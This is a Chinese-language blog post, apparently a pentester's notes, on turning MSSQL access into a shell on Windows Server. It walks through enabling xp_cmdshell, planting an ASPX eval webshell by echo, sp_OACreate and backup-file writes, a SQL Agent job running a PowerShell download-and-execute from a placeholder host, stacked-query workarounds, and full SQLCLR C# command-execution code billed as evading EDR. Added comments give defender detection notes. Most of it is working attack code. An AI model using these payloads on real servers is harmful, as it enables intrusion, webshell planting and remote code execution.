
mssql_getshell的一些总结

简介:

  • mssql获取shell的总结

    一些针对MSSQL服务的攻击手法学习

环境介绍:

系统版本: Windows Server 2008 R2 x64

MSSQL 数据库版本: SQL Server 2008

技能一:

xp_cmdshell

开启 xp_cmdshell

-- Turns on the xp_cmdshell extended stored procedure through sp_configure:
-- first expose the advanced options, then set 'xp_cmdshell' to 1 and
-- RECONFIGURE so the change takes effect. The option is off by default.
-- NOTE(review): sp_configure changes need the ALTER SETTINGS server
-- permission (presumably sysadmin in practice); each change also writes a
-- "Configuration option 'xp_cmdshell' changed from 0 to 1" line to the
-- SQL Server error log, which is a cheap thing to alert on.
EXEC sp_configure 'show advanced options',1
go
RECONFIGURE
go
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO

未开启该选项时,执行 xp_cmdshell 会报错

1.jpg

执行系统命令

-- Runs 'whoami' through xp_cmdshell; the output rows show which Windows
-- account the SQL Server service runs as.
-- Defender note: xp_cmdshell spawns cmd.exe from the database engine
-- process, so a cmd.exe whose parent is sqlservr.exe (typically) is the
-- process-tree artefact to hunt for.
exec xp_cmdshell 'whoami'

2.jpg

写webshell:

-- Drops an ASPX page into C:\Windows\Temp with cmd's echo redirection;
-- the '^' characters are cmd escapes for '<' and '>'. The page evaluates
-- whatever arrives in the 'pass' request item, i.e. it is a one-line webshell.
-- Defender note: a .aspx/.asp file written by cmd.exe that was launched from
-- the SQL Server process, under Temp or a web root, is a high-confidence
-- indicator; file-creation telemetry on script extensions catches it.
exec xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > C:\Windows\Temp\cmd.aspx'

3.jpg

技能二:

由于某些安全软件(如某60)会拦截 xp_cmdshell 组件,导致 cmd 命令无法执行,或者该组件已被删除,因此可以改用 sp_OACreate 组件。

SP_OACreate

开启 sp_OACreate(Ole Automation Procedures):

-- Enables the OLE Automation procedures (sp_OACreate / sp_OAMethod) and
-- then hides the advanced options again (last line), so a casual
-- sp_configure listing will not show the change. WITH OVERRIDE skips the
-- value validation RECONFIGURE normally performs.
-- Defender note: 'Ole Automation Procedures' is off by default and rarely
-- needed; the same error-log "Configuration option ... changed" message is
-- written for it, so alert on that line for this option as well.
EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;

写webshell:

-- File write through COM automation: sp_OACreate instantiates
-- Scripting.FileSystemObject, CreateTextFile opens C:\Windows\Temp\test.aspx
-- (the trailing 1 = overwrite), and WriteLine writes one line into it.
-- Note that the text written here is only the marker 'winter is coming';
-- despite the heading, this snippet does not write the ASPX page itself.
-- Defender note: sp_OACreate with 'scripting.filesystemobject' almost never
-- appears in legitimate workloads; the COM object presumably runs under the
-- SQL Server service account, so file writes from sqlservr.exe are the signal.
declare @sp_passwordxieo int, @f int, @t int, @ret int;
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out;
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'C:\Windows\Temp\test.aspx', 1;
exec @ret = sp_oamethod @f, 'writeline', NULL,'winter is coming';--

4.jpg

技能三

差异备份拿shell

-- Differential-backup write. A throwaway database gets a full backup, a
-- table with an image column is filled with the hex-encoded ASPX page, and a
-- WITH DIFFERENTIAL,FORMAT backup is then written to a path ending in .aspx,
-- so the blob lands verbatim inside the backup file. The '#' prefixes and
-- '//' annotations are the author's markup, not T-SQL syntax.
-- Defender note: BACKUP DATABASE ... TO DISK with a script extension, or a
-- destination outside the configured backup directory, is an auditable
-- anomaly; backup history is presumably retained in msdb (backupset /
-- backupmediafamily), which records the destination path after the fact.
#create database test;																				//创建数据库
#backup database test to disk = 'C:\Windows\Temp\bak.bak'; //创建数据库备份文件路径
#create table [dbo].[dtest] ([cmd][image]); //创建表
#insert into dtest(cmd) values(0x3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c256576616c28526571756573742e4974656d5b2270617373225d2c22756e7361666522293b255e3e); //字段写入webshell hex编码
#backup database test to disk='C:\Windows\Temp\bake.aspx' WITH DIFFERENTIAL,FORMAT; //导出webshell到目录

5.jpg

技能四

log备份拿shell

-- Log-backup variant of the same idea: the database is switched to FULL
-- recovery (log backups are only possible then), an initial log backup WITH
-- INIT is taken, the hex-encoded page is inserted into an image column, and
-- the next BACKUP LOG is written to a path ending in .aspx. The '#' prefixes
-- and '//' annotations are the author's markup, not T-SQL syntax.
-- Defender note: ALTER DATABASE ... SET RECOVERY FULL on a freshly created
-- database followed by BACKUP LOG to a non-backup location is a pattern
-- worth alerting on; the same msdb backup history applies here.
#create database test;																				//创建数据库
#alter database test set RECOVERY FULL //设置为恢复模式
#create table cmd (a image) //创建表
#backup log test to disk = 'C:\Windows\Temp\bakbak' with init //初始化备份目录
#insert into cmd (a) values (0x3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c256576616c28526571756573742e4974656d5b2270617373225d2c22756e7361666522293b255e3e) //插入键值webshellhex编码
#backup log test to disk = 'C:\Windows\Temp\testtest.aspx'

6.jpg

技能五

通过Agent Job 执行命令

前提:需要 SQL Server 代理服务(SQL Server Agent)正常开启

-- Starts the SQL Server Agent Windows service from inside T-SQL using the
-- undocumented xp_servicecontrol extended procedure.
-- Defender note: a service being started by the database engine rather than
-- an administrator is unusual; the Service Control Manager records the state
-- change in the Windows System event log (event 7036 for "entered the
-- running state"), which can be correlated with the SQL login in question.
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

10.png

使用方法:

-- Creates and immediately starts a SQL Server Agent job with one step in the
-- PowerShell subsystem. The @command is a download-and-execute one-liner
-- (hidden window, no profile) pointing at a placeholder host
-- (xxx.xxx.xxx.xxx:xxxxx); the step retries once after 5 minutes on failure.
-- The job must be attached to a server with sp_add_jobserver before
-- sp_start_job can run it.
-- Defender note: job and step definitions persist in msdb (sysjobs /
-- sysjobsteps), so the full @command text stays on disk until the job is
-- deleted — a good hunting source. PowerShell launched as a child of the
-- Agent process (typically SQLAGENT.EXE) with -w hidden is also a strong
-- process-tree signal.
USE msdb;
GO
EXEC dbo.sp_add_job
@job_name = N'test_powershell_job1' ;
GO
EXEC sp_add_jobstep
@job_name = N'test_powershell_job1',
@step_name = N'test_powershell_name1',
@subsystem = N'PowerShell',
@command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://xxx.xxx.xxx.xxx:xxxxx/file''))"',

@retry_attempts = 1,
@retry_interval = 5;
GO
EXEC dbo.sp_add_jobserver
@job_name = N'test_powershell_job1';
GO
EXEC dbo.sp_start_job N'test_powershell_job1';
GO

上线

11.png

tip

在 MSSQL 不支持堆叠查询的情况下,实现命令执行

(1)使用openrowset函数

前提:需要开启 Ad Hoc Distributed Queries 组件

-- Enables 'Ad Hoc Distributed Queries' (needed by OPENROWSET below), written
-- as a single line without statement separators — presumably because the
-- technique targets contexts where stacked queries cannot be sent.
-- Defender note: this option is off by default and the sp_configure change
-- is logged to the SQL Server error log like the others; keeping it off
-- disables the OPENROWSET loopback entirely.
exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure

利用

OPENROWSET
( { 'provider_name'
, { 'datasource' ; 'user_id' ; 'password' | 'provider_string' }
, { <table_or_view> | 'query' }
| BULK 'data_file' ,
{ FORMATFILE = 'format_file_path' [ <bulk_options> ]
| SINGLE_BLOB | SINGLE_CLOB | SINGLE_NCLOB }
} )



最终语句:
-- Loopback through OPENROWSET: opens a second connection to the local
-- instance with the SQLOLEDB provider (trusted_connection=yes, i.e. the
-- service's own Windows identity) and runs xp_cmdshell inside the query text,
-- so the whole thing is one SELECT rather than a stacked statement.
-- 'set fmtonly off' presumably stops the provider from executing the inner
-- batch in metadata-only mode. The dsn value is reproduced as given in the post.
-- Defender note: requires 'Ad Hoc Distributed Queries' = 1 and an enabled
-- xp_cmdshell; either one being off defeats it.
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''whoami''')

7.png

(2)使用 IF 语句执行 exec

IF Boolean_expression  
{ sql_statement | statement_block }
[ ELSE
{ sql_statement | statement_block } ]


最终语句:
-- Same batch, no ';' needed: the IF ... EXEC that follows the SELECT is
-- parsed as the next statement of the batch, so a command runs where a
-- classic stacked query is not available.
-- Defender note: the execution still goes through xp_cmdshell, so the
-- mitigation is the same — leave xp_cmdshell disabled and alert when it is
-- turned on.
select 1 where 1=1 if 1=1 exec xp_cmdshell 'whoami'

8.png

(3)无文件落地执行系统命令

MSSQL 可通过加载 CLR 程序集来执行命令,原理上有点类似于 MySQL 通过加载恶意 so 文件实现命令执行。

特点:绕过edr等杀软

开启 CLR 的语句:

-- Enables CLR integration so user assemblies can be loaded and their methods
-- bound to T-SQL procedures.
-- Defender note: 'clr enabled' is off by default; turning it on is logged in
-- the SQL Server error log like the other sp_configure changes. On newer
-- versions (SQL Server 2017+) the 'clr strict security' option treats every
-- assembly as UNSAFE unless it is signed and trusted, which blocks the
-- TRUSTWORTHY-only loading path shown in this section.
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO

将数据库标记为可信(TRUSTWORTHY)

-- Marks master as TRUSTWORTHY so an assembly with the UNSAFE permission set
-- (needed for Process.Start in the demo code) can be loaded without a signed
-- assembly and matching login.
-- Defender note: TRUSTWORTHY should be OFF on every user database and on
-- master; sys.databases.is_trustworthy_on exposes the flag for a quick audit,
-- and an ALTER DATABASE that flips it is a high-value alert.
ALTER DATABASE master SET TRUSTWORTHY ON;

demo代码:

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

// SQLCLR stored-procedure class: exposes ExecCommand, which hands an
// arbitrary string to "cmd.exe /c" on the database host and streams the
// output back to the client through SqlContext.Pipe.
// Because it spawns processes it must be loaded with the UNSAFE permission
// set, which is why the post sets the database TRUSTWORTHY first.
// Defender note: SQLCLR code runs inside sqlservr.exe, so the observable
// artefact is cmd.exe with sqlservr.exe as parent (presumably), plus an
// UNSAFE assembly visible in sys.assemblies (permission_set_desc).
public partial class StoredProcedures
{
// Entry point bound from T-SQL (CREATE PROCEDURE ... EXTERNAL NAME).
// cmd is concatenated verbatim into the cmd.exe argument string, so any
// principal with EXECUTE on the procedure gets command execution as the
// SQL Server service account.
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecCommand (string cmd)
{
// place code here
SqlContext.Pipe.Send("Command is running, please wait.");
SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
}
// Runs filename with arguments as a hidden, windowless child process,
// collects stdout asynchronously into a buffer, reads stderr to end and
// waits for exit. Returns the captured stdout; stderr is only reported via
// SqlContext.Pipe, never returned.
public static string RunCommand(string filename,string arguments)
{
var process = new Process();

process.StartInfo.FileName = filename;
if (!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments = arguments;
}

process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
// UseShellExecute must be false for the redirections below to be legal.
process.StartInfo.UseShellExecute = false;

process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
var stdOutput = new StringBuilder();
// args.Data is null on the final end-of-stream callback, so AppendLine(null)
// leaves one extra blank line at the end of the buffer.
process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
string stdError = null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch (Exception e)
{
// Only the message is reported; execution falls through to the ExitCode
// read below, which throws InvalidOperationException if Start() failed.
SqlContext.Pipe.Send(e.Message);
}

if (process.ExitCode == 0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
// Non-zero exit: send stderr (if any) and stdout (if any) as one message.
var message = new StringBuilder();

if (!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}

if (stdOutput.Length != 0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
}
// The Process object is never disposed; handles live until GC.
return stdOutput.ToString();
}
}

创建存储过程:

-- Binds a T-SQL procedure to the CLR method StoredProcedures.ExecCommand in
-- the assembly registered as [evilclr]. The CREATE ASSEMBLY step that loads
-- the DLL is not shown in the post.
-- Defender note: sys.assemblies and sys.assembly_modules list every user
-- assembly and the procedures bound to it; an assembly with
-- permission_set_desc = 'UNSAFE_ACCESS' on a production instance deserves
-- immediate review.
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [evilclr].[StoredProcedures].[ExecCommand]
go

执行命令:

-- Invokes the CLR-backed procedure; 'whoami' is passed straight through to
-- cmd.exe /c, so the result again shows the SQL Server service account.
exec dbo.execcommand 'whoami'

9.png

攻击框架:

https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit

(4)站库分离、目标不出网时的攻击手法

参考链接: